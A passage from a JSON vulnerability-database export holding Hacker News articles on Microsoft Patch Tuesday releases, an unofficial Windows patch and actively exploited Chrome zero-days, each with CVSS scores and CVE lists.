6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-11T16:34:05", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhMS1eQr1RHrJ4KbCeIAsD8LFjXS1pwaUn-CV_sgwffkJuTbtzEVFzH-MbTDp5Xux8sLeBam6yIiQBAEjbLyQubLgQjrWdabwHSiFTxmW-gozRenj_otXidWxopI20Oyu0nZYzgx96UWaVUcPM0K9d7jbK60XwY_4YW6I6w_mypjEqDN6ua4QOevUEQ/s728-e100/windows-update-download.jpg>)\n\nMicrosoft on Tuesday rolled out fixes for as many as [74 security vulnerabilities](<https://msrc.microsoft.com/update-guide/releaseNote/2022-May>), including one for a zero-day bug that's being actively exploited in the wild.\n\nOf the 74 issues, seven are rated Critical, 66 are rated Important, and one is rated low in severity. Two of the flaws are listed as publicly known at the time of release.\n\nThese encompass 24 remote code execution (RCE), 21 elevation of privilege, 17 information disclosure, and six denial-of-service vulnerabilities, among others. The updates are in addition to [36 flaws](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) patched in the Chromium-based Microsoft Edge browser on April 28, 2022.\n\nChief among the resolved bugs is [CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>) (CVSS score: 8.1), a spoofing vulnerability affecting the Windows Local Security Authority ([LSA](<https://docs.microsoft.com/en-us/windows/win32/secauthn/lsa-authentication>)), which Microsoft describes as a \"protected subsystem that authenticates and logs users onto the local system.\"\n\n\"An unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate to the attacker using [NTLM](<https://en.wikipedia.org/wiki/NT_LAN_Manager>),\" the company said. 
\"This security update detects anonymous connection attempts in LSARPC and disallows it.\"\n\nIt's also worth noting that the severity rating of the flaw would be elevated to 9.8 if it were to be chained with [NTLM relay attacks](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) on Active Directory Certificate Services (AD CS) such as [PetitPotam](<https://thehackernews.com/2021/07/new-petitpotam-ntlm-relay-attack-lets.html>).\n\n\"Being actively exploited in the wild, this exploit allows an attacker to authenticate as approved users as part of an NTLM relay attack - letting threat actors gain access to the hashes of authentication protocols,\" Kev Breen, director of cyber threat research at Immersive Labs, said.\n\nThe two other publicly-known vulnerabilities are as follows -\n\n * [CVE-2022-29972](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29972>) (CVSS score: 8.2) - Insight Software: CVE-2022-29972 Magnitude Simba Amazon Redshift ODBC Driver (aka [SynLapse](<https://thehackernews.com/2022/05/microsoft-mitigates-rce-vulnerability.html>))\n * [CVE-2022-22713](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22713>) (CVSS score: 5.6) - Windows Hyper-V Denial-of-Service Vulnerability\n\nMicrosoft, which remediated CVE-2022-29972 on April 15, tagged it as \"Exploitation More Likely\" on the Exploitability Index, making it imperative that affected users apply the updates as soon as possible.\n\nAlso patched by Redmond are several RCE bugs in Windows Network File System ([CVE-2022-26937](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26937>)), Windows LDAP ([CVE-2022-22012](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22012>), [CVE-2022-29130](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29130>)), Windows Graphics 
([CVE-2022-26927](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26927>)), Windows Kernel ([CVE-2022-29133](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29133>)), Remote Procedure Call Runtime ([CVE-2022-22019](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22019>)), and Visual Studio Code ([CVE-2022-30129](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30129>)).\n\nCyber-Kunlun, a Beijing-based cybersecurity company, has been credited with reporting [30 of the 74 flaws](<https://twitter.com/mj0011sec/status/1524083750400708609>), counting CVE-2022-26937, CVE-2022-22012, and CVE-2022-29130.\n\nWhat's more, CVE-2022-22019 follows an incomplete patch for [three RCE vulnerabilities](<https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html>) in the Remote Procedure Call (RPC) runtime library \u2014 CVE-2022-26809, CVE-2022-24492, and CVE-2022-24528 \u2014 that were addressed by Microsoft in April 2022.\n\nExploiting the flaw would allow a remote, unauthenticated attacker to execute code on the vulnerable machine with the privileges of the RPC service, Akamai [said](<https://www.akamai.com/blog/security/rpc-runtime-patch-tuesday-take-two>).\n\nThe Patch Tuesday update is also notable for resolving two privilege escalation ([CVE-2022-29104](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29104>) and [CVE-2022-29132](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29132>)) and two information disclosure ([CVE-2022-29114](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29114>) and [CVE-2022-29140](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29140>)) vulnerabilities in the Print Spooler component, which has long posed an attractive target for attackers. 
\n\n### Software Patches from Other Vendors\n\nBesides Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [AMD](<https://www.amd.com/en/corporate/product-security>)\n * [Android](<https://thehackernews.com/2022/05/google-releases-android-update-to-patch.html>)\n * [Cisco](<https://thehackernews.com/2022/05/cisco-issues-patches-for-3-new-flaws.html>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [F5](<https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html>)\n * [Google Chrome](<https://chromereleases.googleblog.com/2022/05/stable-channel-update-for-desktop_10.html>)\n * [HP](<https://support.hp.com/us-en/security-bulletins>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/May-2022>)\n * [Mozilla Firefox, Firefox ESR, and Thunderbird](<https://www.mozilla.org/en-US/security/advisories/>)\n * [Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2022-bulletin.html>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider 
Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T05:29:00", "type": "thn", "title": "Microsoft Releases Fix for New Zero-Day with May 2022 Patch Tuesday Updates", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22012", "CVE-2022-22019", "CVE-2022-22713", "CVE-2022-24492", "CVE-2022-24528", "CVE-2022-26809", "CVE-2022-26925", "CVE-2022-26927", "CVE-2022-26937", "CVE-2022-29104", "CVE-2022-29114", "CVE-2022-29130", "CVE-2022-29132", "CVE-2022-29133", "CVE-2022-29140", "CVE-2022-29972", "CVE-2022-30129"], "modified": "2022-05-11T16:06:59", "id": "THN:6F5BF10AC5A30E497851C9ADE15C774A", "href": 
"https://thehackernews.com/2022/05/microsoft-releases-fix-for-new-zero-day.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:52", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEiL_ZBAXmRadIpTCtIL6ko2RhRBQ3M8KOXg7jLdsxCjWl-V2Hk47PVfsYkcW-ZGiMl6CyhTYXcxIFCB3jWTn6ByqP9laZRQ3JiUFSBvb-fc_RWVEwQdJNgKNOxDwYPGv55yleW0ySMgaRuaksIn50zw3gG563opnN_wxTB8iSMcvhUeQ17KH-AY68rs>)\n\nUnofficial patches have been issued to remediate an improperly patched Windows security vulnerability that could allow information disclosure and local privilege escalation (LPE) on vulnerable systems.\n\nTracked as [CVE-2021-24084](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24084>) (CVSS score: 5.5), the flaw concerns an information disclosure vulnerability in the Windows Mobile Device Management component that could enable an attacker to gain unauthorized file system access and read arbitrary files.\n\nSecurity researcher Abdelhamid Naceri was credited with discovering and reporting the bug in October 2020, prompting Microsoft to address the issue as part of its February 2021 Patch Tuesday updates.\n\nBut as [observed](<https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html>) by Naceri in June 2021, not only could the patch be bypassed to achieve the same objective, the researcher this month found that the incompletely patched vulnerability could also be [exploited](<https://twitter.com/KLINIX5/status/1455500874596356098>) to gain administrator privileges and run malicious code on Windows 10 machines running the [latest security updates](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>).\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgMZQpplV3ZiAcHEwmMtQcHAz3YyxyHAiW5jeWeu9T3hsQp50k-M3uoVMRHw8T9mtaGFHLoV6lAfluit3rHY6ojhU5kaukhNj_aHGxKMo2fteTd2XFcRIglOh3Ge34soXm23wwNDq0H_DeD786rYBCsEqBbia1jy1cBQSY3C7lv4NT8Ms-LiBp5S_UP>)\n\n\"Namely, as 
[HiveNightmare/SeriousSAM](<https://thehackernews.com/2021/07/new-windows-and-linux-flaws-give.html>) has taught us, an arbitrary file disclosure can be upgraded to local privilege escalation if you know which files to take and what to do with them,\" 0patch co-founder Mitja Kolsek [said](<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>) in a post last week.\n\nHowever, it's worth noting that the vulnerability can be exploited to accomplish privilege escalation only under specific circumstances, namely when the system protection feature is enabled on C: Drive and at least one local administrator account is set up on the computer.\n\nNeither Windows Servers nor systems running Windows 11 are affected by the vulnerability, but the following Windows 10 versions are impacted \u2014\n\n * Windows 10 v21H1 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v20H2 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v2004 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1909 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1903 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1809 (32 & 64 bit) updated with May 2021 Updates\n\nCVE-2021-24084 is also the third zero-day Windows vulnerability to rear its head again as a consequence of an incomplete patch issued by Microsoft. 
Earlier this month, 0patch [shipped](<https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html>) unofficial fixes for a local privilege escalation vulnerability ([CVE-2021-34484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>)) in the Windows User Profile Service that enables attackers to gain SYSTEM privileges.\n\nThen last week, Naceri disclosed details of another zero-day flaw in the Microsoft Windows Installer service ([CVE-2021-41379](<https://thehackernews.com/2021/11/warning-hackers-exploiting-new-windows.html>)) that could be bypassed to achieve elevated privileges on devices running the latest Windows versions, including Windows 10, Windows 11, and Windows Server 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-30T09:11:00", "type": "thn", "title": "Unpatched Unauthorized File Read Vulnerability Affects Microsoft Windows OS", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": 
"NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084", "CVE-2021-34484", "CVE-2021-41379"], "modified": "2021-12-03T03:42:06", "id": "THN:BABD510622DAA320F3F1F55EEDD7549A", "href": "https://thehackernews.com/2021/11/unpatched-unauthorized-file-read.html", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2022-05-09T12:39:28", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhpjCuGD4WXaNN6nxKO5EalNHXrEO1r2PgkwQYS5Z4fg1J1iNhNuSZu4tqOM6Ohl9vpp6QyHLYCS9rWACrVbbaIJUPQ9rTXrZPXmPG7SMzGybYouS2Gy54kBSr90hQqQD0npkDgUM7qiCLvQEpG86SHqny5-bN6yTHLRxPBtls52iaOhN5Ui-sM9RZ4/s728-e100/chrome-extensions.jpg>)\n\nGoogle on Thursday shipped emergency patches to address two security issues in its Chrome web browser, one of which it says is being actively exploited in the wild.\n\nTracked as [CVE-2022-1364](<https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html>), the tech giant described the high-severity bug as a case of type confusion in the V8 JavaScript engine. Cl\u00e9ment Lecigne of Google's Threat Analysis Group has been credited with reporting the flaw on April 13, 2022.\n\nAs is typically the case with actively exploited zero-day flaws, the company acknowledged it's \"aware that an exploit for CVE-2022-1364 exists in the wild.\" Additional details about the flaw and the identity of the threat actors have been withheld to prevent further abuse.\n\nWith the latest fix, Google has patched a total of three zero-day vulnerabilities in Chrome since the start of the year. 
It's also the second type confusion-related bug in V8 to be squashed in less than a month -\n\n * [CVE-2022-0609](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [CVE-2022-1096](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh6B83ZXigpC9fguwiLwmsTF6j73zc5NEtpSNiGfAAl-clSHcXVa31RbaQfOCfKesHRCqidahWfYEq_lTb6Wo-qPTz15of2-8gP75by67zdsyHfHawMXYaPWSZQLF1KIVi7jyn0uf4bWxBN0j73AHcGrmJOkXRdboYNb6jCKG2veHy3dPK8riejHmuo/s728-e100/chrome-update.jpg>)\n\nUsers are recommended to update to version 100.0.4896.127 for Windows, macOS, and Linux to thwart potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T03:25:00", "type": "thn", "title": "Google Releases Urgent Chrome Update to Patch Actively Exploited Zero-Day Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364"], "modified": "2022-04-18T03:04:38", "id": "THN:E48AEFF468AB8445D91A32B6F5D7A770", "href": "https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-15T06:13:26", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhJcMd3_5v9AfJeccyNG75bWutsql3ZWUQopaddjFIniiwaHARP25cBu8hBIZVDJUIqPwdaIHPb7rSEvso0ThjD0TRU4MY2SHxjiVunEhFrlGstBY93fIcrVAr2SyU3lrCvFnaVvNPPA3mJM1cncQcVYJnaDqM2KEb4WvCFQ7qcZ9G10xetXKZcG63C/s728-e365/ms.png>)\n\nMicrosoft on Tuesday released [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2023-Feb>) to address 75 flaws spanning its product portfolio, three of which have come under active exploitation in the wild.\n\nThe updates are in addition to 22 flaws the Windows maker [patched](<https://learn.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in its Chromium-based Edge browser over the past month.\n\nOf the 75 vulnerabilities, nine are rated Critical and 66 are rated Important in severity. 37 out of 75 bugs are classified as remote code execution (RCE) flaws. 
The three zero-days of note that have been exploited are as follows -\n\n * [**CVE-2023-21715**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-21715>) (CVSS score: 7.3) - Microsoft Office Security Feature Bypass Vulnerability\n * [**CVE-2023-21823**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-21823>) (CVSS score: 7.8) - Windows Graphics Component Elevation of Privilege Vulnerability\n * [**CVE-2023-23376**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-23376>) (CVSS score: 7.8) - Windows Common Log File System (CLFS) Driver Elevation of Privilege Vulnerability\n\n\"The attack itself is carried out locally by a user with authentication to the targeted system,\" Microsoft said in an advisory for CVE-2023-21715.\n\n\"An authenticated attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website which could lead to a local attack on the victim computer.\"\n\nSuccessful exploitation of the above flaws could enable an adversary to bypass Office macro policies used to block untrusted or malicious files or gain SYSTEM privileges.\n\nCVE-2023-23376 is also the third actively exploited zero-day flaw in the CLFS component after [CVE-2022-24521](<https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html>) and [CVE-2022-37969](<https://thehackernews.com/2022/09/microsofts-latest-security-update-fixes.html>) (CVSS scores: 7.8), which were addressed by Microsoft in April and September 2022.\n\n\"The Windows Common Log File System Driver is a component of the Windows operating system that manages and maintains a high-performance, transaction-based log file system,\" Immersive Labs' Nikolas Cemerikic said.\n\n\"It is an essential component of the Windows operating system, and any vulnerabilities in this driver could have significant implications for the security and reliability of the 
system.\"\n\nIt's worth noting that Microsoft OneNote for Android is vulnerable to CVE-2023-21823, and with the note-taking service increasingly emerging as a [conduit for delivering malware](<https://thehackernews.com/2023/02/post-macro-world-sees-rise-in-microsoft.html>), it's crucial that users apply the fixes.\n\nAlso addressed by Microsoft are multiple RCE defects in Exchange Server, ODBC Driver, PostScript Printer Driver, and SQL Server as well as denial-of-service (DoS) issues impacting Windows iSCSI Service and Windows Secure Channel.\n\nThree of the Exchange Server flaws are classified by the company as \"Exploitation More Likely,\" although successful exploitation requires the attacker to be already authenticated.\n\nExchange servers have [proven](<https://thehackernews.com/2023/01/microsoft-urges-customers-to-secure-on.html>) to be [high-value targets](<https://www.tenable.com/blog/proxynotshell-owassrf-tabshell-patch-your-microsoft-exchange-servers-now>) in recent years as they can enable unauthorized access to sensitive information, or facilitate Business Email Compromise (BEC) attacks.\n\n## Software Patches from Other Vendors\n\nBesides Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [AMD](<https://www.amd.com/en/corporate/product-security>)\n * [Android](<https://source.android.com/docs/security/bulletin/2023-02-01>)\n * [Apple](<https://thehackernews.com/2023/02/patch-now-apples-ios-ipados-macos-and.html>)\n * [Atlassian](<https://thehackernews.com/2023/02/atlassians-jira-software-found.html>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * 
[CODESYS](<https://www.codesys.com/security/security-reports.html>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Drupal](<https://www.drupal.org/security>)\n * [F5](<https://my.f5.com/manage/s/article/K000130496>)\n * [GitLab](<https://about.gitlab.com/releases/2023/02/14/critical-security-release-gitlab-15-8-2-released/>)\n * [Google Chrome](<https://chromereleases.googleblog.com/>)\n * [HP](<https://support.hp.com/us-en/security-bulletins>)\n * [IBM](<https://www.ibm.com/support/pages/bulletin/>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * [Juniper Networks](<https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=date%20descending&f:ctype=\\[Security%20Advisories\\]>)\n * [Lenovo](<https://support.lenovo.com/us/en/product_security/ps500001-lenovo-product-security-advisories>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/February-2023>)\n * [Mozilla Firefox, Firefox ESR, and Thunderbird](<https://www.mozilla.org/en-US/security/advisories/>)\n * [NETGEAR](<https://www.netgear.com/about/security/>)\n * [NVIDIA](<https://www.nvidia.com/en-us/security/>)\n * [Palo Alto Networks](<https://security.paloaltonetworks.com/>)\n * [Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/february-2023-bulletin.html>)\n * [Samba](<https://www.samba.org/samba/history/>)\n * [Samsung](<https://security.samsungmobile.com/securityUpdate.smsb>)\n * 
[SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n * [Sophos](<https://www.sophos.com/en-us/security-advisories>)\n * [Synology](<https://www.synology.com/en-in/security/advisory>)\n * [Trend Micro](<https://success.trendmicro.com/dcx/s/vulnerability-response?language=en_US>)\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n * [Zoho](<https://pitstop.manageengine.com/portal/en/community/filter/announcement>), and\n * [Zyxel](<https://www.zyxel.com/global/en/support/security-advisories>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-15T04:21:00", "type": "thn", "title": "Update Now: Microsoft Releases Patches for 3 Actively Exploited Windows Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521", "CVE-2022-37969", "CVE-2023-21715", "CVE-2023-21823", "CVE-2023-23376"], "modified": "2023-02-15T04:21:13", "id": "THN:2FAF5419051DEBA89A6A8764081CBE01", "href": "https://thehackernews.com/2023/02/update-now-microsoft-releases-patches.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-05T16:25:13", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjPIpWOjahlvRij54ICh2NyDdEkKI9koTk4lx8UXqPG1hBOVokLO1jZE7QvnnAHX4fw21sdwK34cVKndChvGxTI0QScuSjwYGvpLSpuK9FSFbuXtXzoaxwm6I78OZwM-uyBKf7_r18ShybiBxFrmBcIKJ7pAD2BPSMaEVwJzpBkK1kNSbrrtJ6AmkPk/s728-e100/chrome-update.jpg>)\n\nGoogle on Monday shipped security updates to address a high-severity zero-day vulnerability in its Chrome web browser that it said is being exploited in the wild.\n\nThe shortcoming, tracked as [**CVE-2022-2294**](<https://chromereleases.googleblog.com/2022/07/stable-channel-update-for-desktop.html>), relates to a heap overflow flaw in the [WebRTC](<https://en.wikipedia.org/wiki/WebRTC>) component that provides real-time audio and video communication capabilities in browsers without the need to install plugins or download native apps.\n\nHeap buffer overflows, also referred to as heap overrun or heap smashing, occur when data is overwritten in the [heap area of the memory](<https://en.wikipedia.org/wiki/Memory_management#Manual_memory_management>), leading to arbitrary code execution or a denial-of-service (DoS) condition.\n\n\"Heap-based overflows can be used to overwrite function pointers that may be living in memory, pointing it to the attacker's code,\" MITRE [explains](<https://cwe.mitre.org/data/definitions/122.html>). \"When the consequence is arbitrary code execution, this can often be used to subvert any other security service.\"\n\nCredited with reporting the flaw on July 1, 2022, is Jan Vojtesek from the Avast Threat Intelligence team. 
It's worth pointing out that the bug also [impacts](<https://chromereleases.googleblog.com/2022/07/chrome-for-android-update.html>) the Android version of Chrome.\n\nAs is usually the case with zero-day exploitation, details pertaining to the flaw as well as other specifics related to the campaign have been withheld to prevent further abuse in the wild and until a significant chunk of users are updated with a fix.\n\nCVE-2022-2294 also marks the resolution of the fourth zero-day vulnerability in Chrome since the start of the year -\n\n * [**CVE-2022-0609**](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [**CVE-2022-1096**](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-1364**](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>) \\- Type confusion in V8\n\nUsers are recommended to update to version 103.0.5060.114 for Windows, macOS, and Linux and 103.0.5060.71 for Android to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\nThe disclosure shortly follows a report from Google Project Zero, which [noted](<https://googleprojectzero.blogspot.com/2022/06/2022-0-day-in-wild-exploitationso-far.html>) that a total of 18 security vulnerabilities have been exploited as unpatched zero-days in the wild so far this year.\n", 
